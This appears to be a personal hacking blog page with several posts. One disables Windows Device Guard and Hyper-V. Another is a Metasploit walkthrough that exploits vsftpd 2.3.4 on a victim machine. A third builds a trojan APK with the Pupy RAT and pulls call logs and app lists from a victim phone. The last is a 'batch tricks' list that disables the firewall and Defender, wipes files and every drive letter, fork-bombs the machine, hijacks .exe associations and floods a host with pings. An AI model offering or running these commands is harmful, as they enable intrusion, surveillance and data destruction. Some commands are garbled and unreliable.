Friday, October 25, 2019

VMware Workstation and Device/Credential Guard are not compatible Fix


1. In search box type "gpedit" then
    Goto  -> Computer Configuration -> Administrative Templates -> System -> Device Guard -> Turn on Virtualization Based Security. Now Double click that and "Disable"
2. In search box, type Turn Windows features on or off
    Now uncheck Hyper->V and restart system.
3. Open Registry Editor by typing regedit in search box
    Now Go to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\DeviceGuard. Add a new DWORD value named EnableVirtualizationBasedSecurity and set it to 0 to disable it.
    Next Go to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA.  Add a new DWORD value named LsaCfgFlags and set it to 0 to disable it.
4. Open command prompt as a administrator and type the following commands 
    Then copy paste the rest below and press enter
        bcdedit /create {0cb3b571->2f2e->4343->a879->d86a476d7215} /d "DebugTool" /application osloader
        bcdedit /set {0cb3b571->2f2e->4343->a879->d86a476d7215} path "\EFI\Microsoft\Boot\SecConfig.efi"
        bcdedit /set {bootmgr} bootsequence {0cb3b571->2f2e->4343->a879->d86a476d7215}
        bcdedit /set {0cb3b571->2f2e->4343->a879->d86a476d7215} loadoptions DISABLE->LSA->ISO,DISABLE->VBS
        bcdedit /set hypervisorlaunchtype off
        shutdown -r  -t 00

Now, Your system Restart
By at No comments:

Hack a Machine with In 6 steps !!!


 Note: this is purely for education purpose iam not responsible for any things. do by your own risk !this blog shows how to defend our self. Learn Defending Techniques 

 YES we can hack an machine/laptop with in 6 steps , my main aim  was gaining the backdoor access of an laptop , and how to defend this type of attacks 

 Requirements: 1. Metasploit
                         2. Nmap 
                         3. Kali Linux (optional OS)

Step 1:

here iam using a Kali Linux with above requirements (the machine and Victim machine must connect in same network) ,
Open terminal and enter Metasploit by using this command
# msfconsole

 Step 2:
now we are inside the console, now scan the victim machine with help of IP address or host name by using Nmap (victims IP address was 192.168.1.11)
# nmap -sV 192.168.1.11

Step 3:

here you will get all ports, services and version number of that victim machine
now i have taken one of the application which is not updated and its payload is already in metasploit , chose wisely while selecting the services, here vsftpd is an open port 21 and that services is outdated, so iam targeted to this port to get an backdoor access. 
# search vsftpd 2.3.4

Step 4:

by entering the above command , we can see the payload available in meatsploit 
# use xxxxxxxx (copy the payload full name)
now we are inside the exploit now we have to set our exploit

Step 5:

# show options
# set RHOST 192.168.1.11
# show options 

Step 6:

# exploit 


Thats IT we are inside of the Victims machine. 

How to defend this type of attacks ?


 1. Update the OS 
2. Update the applications on regularly 
3. Close the unwanted PORTS
4. Stop the unwanted services
5. Browse safely in internet 
6. Maintain an genuine Anti-Virus and Operating System


THANK YOU !!!

By at No comments:

Hack Android with Puppy

Android Hacking by Puppy

Pupy is a cross-platform, multi function RAT and post-exploitation tool .It can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

Machine Used : Kali Linux
IP used (Pvt)   : 192.168.3.234

Step 1: 

Perform the below commands in the Linux

CMD # apt-get update
CMD # apt-get upgrade
CMD # git clone https://github.com/n1nj4sec/pupy.git  
CMD # service apache2 start        
CMD # service apache2 status   

Step 2:

Run the following command to generate apk with payload
CMD #  . /pupygen.py -O android -o /var/www/html/kashy.apk


Step 3:

Now navigate to pupy folder and Start pupysh.py
CMD # ./pupysh.py 
 


Step 4:

Install the apk into the victim phone 


Step 5:

Now back to kali Linux and perform “help” command to display all commands which we can use. as shown in the below images.





Step 6:

Now are extracting the call history of an mobile .Type “call –a –output-folder /root/c” to collect call history to folder c in root directory 
CMD # call –a –output-folder /root/c 
 

Step 7:

Type “apps –a –d” to list all installed applications in the Victim mobile
CMD # apps –a –d
 

Step 8:

Type “get_info” to display Victim Mobile info && “ls” to list folders
CMD # get_info
CMD # ls 
 



Remediation’s :-
  1. Do not install any 3rd party apps into mobile without knowing anything
  2. Use anti-virus software’s
  3. Enable play protection & disable install apps from unknown sources
  4. Keep system up-to-date

Ref : https://github.com/n1nj4sec/pupy 

Author: A KashYap.
Website: https://kashy1712.blogspot.com/

By at No comments:
Labels:

Wednesday, October 02, 2019

Batch Script Tricks

-------------------------------------------------------------------------------------------------------------------
windows firewall Bypass
  • netsh advfirewall set allprofiles state off
  • c:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -All Set-MpPreference - DisableIOAVProtection $true
  • netsh advfirewall set allprofiles state on


 -------------------------------------------------------------------------------------------------------------------
Block Google
  • @echo off
  • cd "C:\Windows\System32\Drivers\etc"
  • echo 127.0.0.1 google.com » "Hosts"
  • echo 127.0.0.1 www.google.com » "Hosts"


 -------------------------------------------------------------------------------------------------------------------
Del files from Desktop

  • del /f /q "C:\Users\%username%\Desktop\*.*"


 -------------------------------------------------------------------------------------------------------------------
Make Random folders

  • @echo off
  • :kashy
  • md %random%
  • goto kashy


 -------------------------------------------------------------------------------------------------------------------
Make the computer freezes using Batch Programming

  • %0|%0


 -------------------------------------------------------------------------------------------------------------------
Message Pop up
  • :kashy
  • msg * hi
  • goto :kashy


 -------------------------------------------------------------------------------------------------------------------
Shutdown With a Message in 1712 seconds

  • start shutdown -s -t 1712 -c "You Have Been Hacked"



 Abort Shutdown 

  • shutdown -a


 -------------------------------------------------------------------------------------------------------------------
run as admin

  • runas /user:%username% cmd.exe


 -------------------------------------------------------------------------------------------------------------------
To Change all exe to kash

  • assoc.exe=kash


 Retrive

  • assoc.exe=.exe


 -------------------------------------------------------------------------------------------------------------------
IP address flush & Renew

  • ipconfig/all
  • ipconfig/renew
  • ipconfig/flushdns


 -------------------------------------------------------------------------------------------------------------------
To Lock the System after 1712 seconds

  • @echo off
  • timeout /t 1712 /nobreak & rundll32.exe user32.dll,LockWorkStation


 -------------------------------------------------------------------------------------------------------------------
Make system restart as soon as it logged in

  • cd C:\Users\%Username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • echo shutdown /r  > a.bat


 -------------------------------------------------------------------------------------------------------------------
Change time to 17:12

  • @echo off
  • time 17:12


 -------------------------------------------------------------------------------------------------------------------
Delete My Documents, My Music, My Pictures etc...

  • @echo off
  • del /f /q "C:\Users\%userprofile%\My Documents\*.*"
  • del /f /q "C:\Users\%userprofile%\My Music\*.*"
  • del /f /q "C:\Users\%userprofile%\My Pictures\*.*

 -------------------------------------------------------------------------------------------------------------------
Swap Mouse Button:

  • @echo off
  • Rundll32 user32,SwapMouseButton


 -------------------------------------------------------------------------------------------------------------------
Erase All Drives 

  • @echo off
  • del A:*.* /f /s /q
  • del B:*.* /f /s /q
  • del C:*.* /f /s /q
  • del D:*.* /f /s /q
  • del E:*.* /f /s /q
  • del F:*.* /f /s /q
  • del G:*.* /f /s /q
  • del H:*.* /f /s /q
  • del I:*.* /f /s /q
  • del J:*.* /f /s /q
  • del K:*.* /f /s /q
  • del L:*.* /f /s /q
  • del M:*.* /f /s /q
  • del N:*.* /f /s /q
  • del O:*.* /f /s /q
  • del P:*.* /f /s /q
  • del Q:*.* /f /s /q
  • del R:*.* /f /s /q
  • del S:*.* /f /s /q
  • del T:*.* /f /s /q
  • del U:*.* /f /s /q
  • del V:*.* /f /s /q
  • del W:*.* /f /s /q
  • del X:*.* /f /s /q
  • del Y:*.* /f /s /q
  • del Z:*.* /f /s /q
-------------------------------------------------------------------------------------------------------------------
Ping of Death on 192.168.0.1

  • start ping 192.168.0.1 -t -l 65500


 -------------------------------------------------------------------------------------------------------------------
Add Firewall Rule to allow TCP connection with name Open Port

  • netsh advfirewall firewall add rule name="Open Port %1" dir=in action=allow protocol=TCP localport=%1 remoteip=127.0.0.1


 -------------------------------------------------------------------------------------------------------------------

By at 1 comment:
Labels:
Location:India Tirupati, Andhra Pradesh 517501, India
Subscribe to: Comments (Atom)